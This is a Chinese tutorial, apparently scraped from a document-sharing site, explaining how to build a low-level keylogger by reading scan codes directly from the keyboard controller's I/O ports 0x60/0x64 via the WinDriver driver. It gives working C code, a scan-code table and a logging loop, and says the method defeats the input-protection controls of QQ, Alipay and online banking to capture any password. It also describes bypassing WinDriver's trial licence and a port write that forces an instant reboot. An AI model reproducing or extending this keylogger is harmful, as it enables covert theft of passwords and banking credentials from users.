直接访问键盘控制芯片获取键盘记录

合集下载
  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

直接访问键盘控制芯片获取键盘记录
键盘是用户和机器之间主要的硬件接口,看看键盘上的那些键就可知道它有多么的复杂了。

键盘是我们隐私的源泉,我们各种信息的传递都要通过它。

作为用户表现信息的媒介,很多怀有恶意目的的人都想截取我们的键盘输入。

目前有很多方法可以做到,比如全局钩子、GetKeyboardStatus()、驱动过滤钩子等,但是如果要截取像QQ这种Hook键盘中断处理程序的保护技术,这些方法都显得无能为力。

为此,我将为大家介绍一种直接访问键盘控制芯片的方法,来实现对键盘输入数据的最底层的读取。

如果我们知道了硬件的输入输出地址,就可以直接对它们进行访问了。

键盘上有一个称为键盘编码器的处理器(Intel 8048或兼容芯片)专门用来扫描收集所有按键按下和松开的状态数据(即扫描码)。

当一个键被按下时,键盘发送的扫描码称为接通扫描码(Make code),或简称为接通码;当一个被按下的键放开时发送的扫描码被称为断开扫描码(Break code),或简称为断开码。

主机键盘控制器专门用来对接收到的键盘扫描码进行解码。

因为每个按键的接通和断开码都是不同的,所以键盘控制器根据扫描码就可以确定用户在操作哪个键了。

整个键盘上所有按键的接通和断开码就组成了键盘的一个扫描码集(Scan Code Set)。

根据电脑的发展,目前已有三套扫描码集可供使用,它们分别是第一套扫描码集,原始XT键盘扫描码集,目前的键盘已经很少发送这类扫描码;第二套扫描码集,现代键盘预设使用的扫描码集,通常称为AT键盘扫描码集;第三套扫描码集,PS/2键盘扫描码集,原IBM推出PS/2微处理机时使用的扫描码集,已很少使用。

AT键盘预设发送的是第二套扫描码集。

虽然如此,主机键盘控制器为了与PC/XT机的软体兼容起见,仍然会把所有接收到的第二套键盘扫描码转换成第一套扫描码,因此,我们从键盘控制器获取的通常为第一套扫描码集。

当一个键被按下时,我们可以从键盘控制器接收到一个XT键盘接通码。

这个扫描码仅表示键盘上某个位置处的键被按下,但还没有对应到某个字符代码上,接通码通常都是一个位组宽度。

例如,按下键“A”的接通码是30(0x1E)。

当一个按下的键被松开时,从键盘控制器端口收到的就是一个断开码。

对于XT键盘(即键盘控制器程序设计端口收到的扫描码),断开码是其接通码加上0x80。

例如,上述“A”键的断开码就是“0x80 + 0x1E = 0x9E”。

表1列出了Scan Code Set 1中的所有扫描码,我们写程序时需要用到!
表1
剩下的问题就是我们如何获取键盘的扫描码,并且将它们翻译出来了。

比如我们如何获取扫描码1E,并且能将它翻译为A键被按下。

键盘控制芯片给我们使用的PC机提供了两个可访问的I/O端口,一个是0x60,一个是0x64,我们能够读取键盘缓冲区中的数据,也能发送控制命令。

打开设备管理器,如图1所示,我们可以清晰地看到它们。

0x60为数据端口,0x64 为命令端口。

图1
通常情况下,我们从0x60读取的数据就是键盘的扫描码,而从0x64读取的数据为键盘的状态字。

状态字的各位含义如下:
Bit7: 从键盘获得的数据奇偶校验错误;
Bit6: 接收超时,置1;
Bit5: 发送超时,置1;
Bit4: 为1,键盘没有被禁止。

为0,键盘被禁止;
Bit3: 为1,输入缓冲器中的内容为命令,为0,输入缓冲器中的内容为数据;
Bit2: 系统标志,加电启动置0,自检通过后置1;
Bit1: 输入缓冲器满置1,i8042 取走后置0;
Bit0: 输出缓冲器满置1,CPU读取后置0。

接下来我们再说一下端口的操作方法。

Windows NT系统是不允许直接操作端口的,只有通过驱动程序才能实现,可供选择的驱动程序有免费开源的winio、windriver等。

由于我的毕业设计涉及到视频采集卡驱动程序的设计,所以就以windirver为例来说明端口操作方法了。

安装好windriver之后,在“\samples \basic_io\”目录下有一个basic_io.c,我们可以直接使用它提供的端口操作函数读写端口。

注意修改IO_init()函数添加如下语句:(责任编辑:admin)
WD_LICENSE lic;
strcpy(lic.cLicense,你的licenseString);
WD_License(hWD, &lic);
这样,我们使用的windrier驱动就去掉了30天试用期限的限制了。

它可以提供的函数如下,有了这些函数,我们就可以直接读写端口了。

BYTE IO_inp(DWORD dwIOAddr)
//从dwIOAddr读取一个字节
WORD IO_inpw(DWORD dwIOAddr)
//从dwIOAddr读取两个字节
DWORD IO_inpd(DWORD dwIOAddr)
//从dwIOAddr读取四个字节
void IO_outp(DWORD dwIOAddr, BYTE bData)
//将一个字节的bData写入dwIOAddr
void IO_outpw(DWORD dwIOAddr, WORD wData)
//将两个字节的bData写入dwIOAddr
void IO_outpd(DWORD dwIOAddr, DWORD dwData)
//将四个字节的bData写入dwIOAddr
为了方便大家测试,我给大家提供一个有趣的例子。

通过读写I/O端口控制键盘上的Num Lock、Caps Lock、Scroll Lock这三个LED指示灯,向0x60端口发送控制命令就可以控制它们的亮灭了。

控制LED的命令是0xED,我们可以在LED没亮之前(实验之前请先使LED 指示灯关掉)发送0xED命令到0x60端口,然后立即发送另一个BYTE指示设置哪个LED,第2个BYTE用最低的3个字节设置这三个指示灯。

问题是这种直接的方法没有考虑键盘控制器是否准备好接收命令。

通常情况下,我们必须等待芯片准备接收命令时再发送命令控制字。

如果芯片没有准备好,将不会产生任何效果。

另外,即使我们读取0x64端口的状态字,确定键盘处于准备接收命令状态,但是我们也不能保证随后发送控制命令的操作不会受到键盘本身驱动程序读写端口引起的干扰。

因此,我们可以采用如下的测试程序。

void light()
{
BYTE status;
while(1)
{
status=IO_inp( 0x00000064);
printf("%x",status);
IO_outp( 0x00000060,0xed);
IO_outp( 0x00000060,0x07);
Sleep(100);
}
}
这样,键盘正确接收到我们控制命令的概率就比较大了。

程序运行几十秒,就会发现键盘上的三个指示灯突然全部亮了起来。

罗嗦了这么多,大家对端口的操作应该有了基本了解了,下面我们开始分析计算机是如何处理我们的按键操作的。

当我们按下或者释放某一按键时,键盘控制器将会在IRQ1号线上送出中断信号,8259A中断控制器将此中断信号与其它外部设备通过其余的IRQ线送来的中断信号进行判优、排队,最后将此信息送给CPU。

CPU在一条指令运行结束后,会查询一下是否有中断信号送来,如果此时发现有中断信号送来,就会通过此中断信号的中断向量在中断描述符表中查询应当使用哪一个中断处理程序。

当找到中断处理程序后,CPU将调用
此中断处理程序进行中断处理。

注意在键盘中断处理程序之前,键盘扫描码已经被放到输出缓冲区中(0x60),中断处理程序所要作的就是从输入缓冲区拿走数据并且翻译数据。

所以我们可以直接读取输出缓冲区,即0x60端口直接获取键盘数据的扫描码,并且不会干扰中断处理程序的正常工作。

注意,我们在轮询扫描码时最好不要读取0x64端口,尽管从该端口可以读取键盘输入输出缓冲区的状态信息(满或空),但是从0x64读取状态字会引起0x60端口上数据的清除,可能会导致键盘驱动无法读取输入数据。

尽管键盘控制器提供了很多操作命令,但我们最好不要往0x60或0x64端口直接写入数据,否则可能产生意想不到的结果,比如IO_outp( 0x00000064,0xfe)操作将会引起操作系统的立即重启(警告,实验前请先做好保存工作,造成文件未保存数据丢失可别说我没提醒哦!),效果如同手动按了机箱上的Reset键,这是由于键盘控制器可以直接控制CPU Reset管脚电平。

有了以上知识,我们就可以着手写一个直接读取键盘控制寄存器的键盘记录程序了。

因为我们要将扫描码翻译出来,所以我使用make code作为数组下标索引打印键的名称。

char
keycode[55][5]={"","ESC","1","2","3","4","5","6","7","8","9","0","-","=","BSP","TAB","Q"," W","E","R","T","Y","U","I","O","P","[","]","ENT","LCT","A","S","D","F","G","H","J","K","L"," ;","'","`","LSH","\\","Z","X","C","V","B","N","M",",",".","/","RSH","*","LAL","SPA","CAP","F1 ","F2","F3","F4","F5","F6","F7","F8","F9","F10","NUM","SCO","7","8","9","-","4","5","6","+ ","1","2","3","0","."};
这里我只定义了前53个扫描码的键名称,对于一般的只记录字母、符号的键盘记录,这些信息已经足够了。

以下为从0x60轮询扫描码的程序代码。

void Log()
{
BYTE retData;
BYTE keyDown;//键按下数据
BYTE keyUp;//键弹起数据
BYTE bCanLog1=1;
BYTE bCanLog2=1;
while(1)
{
retData=IO_inp( (DWORD)0x00000060);
if(retData==0x00||retData==0xff||retData==0xaa||retData==0xee||retData==0xf0||ret Data==0xfa||retData==0xfe||retData==0xfc)
{
Sleep(50);
continue;
//非扫描码数据的过滤,可以根据情况添加自己不需要的按键信息(责任编辑:admin)
}
//键按下产生make code,键放开产生break code,make code最高位为0。

keycode使用make code作为索引打印按键
if(!(retData&0x80)) //有键被按下
keyDown=retData;
}//有键放开!retData第7位为1!我们使用make code记录键值,make code第7位为0!if(retData&0x80)
{
keyUp=retData&0x7f;
if(keyUp==keyDown)
{
printf("%s ",keycode[keyDown]);
keyUp=0;
keyDown=1;
}
}
Sleep(50);
}
}
因为程序是从最底层获取键盘扫描码数据的,所以对于使用PS/2键盘的用户,可以截取到他们在任何安全保护情况下的输入信息,包括QQ nProtect技术的安全控件、支付宝安全控件、网上银行安全控件等。

鉴于巨大危害性,我这里只提供了演示程序,效果如图2和图3所示。

图2
至于其他更详细的应用,大家可以在我提供的程序的基础上进行扩充。

只要我们能够直接访问键盘控制芯片,那么任它再有效的输入保护措施,对我们来说都是如同虚设,想要什么密码就可以获得什么密码。

相关文档
最新文档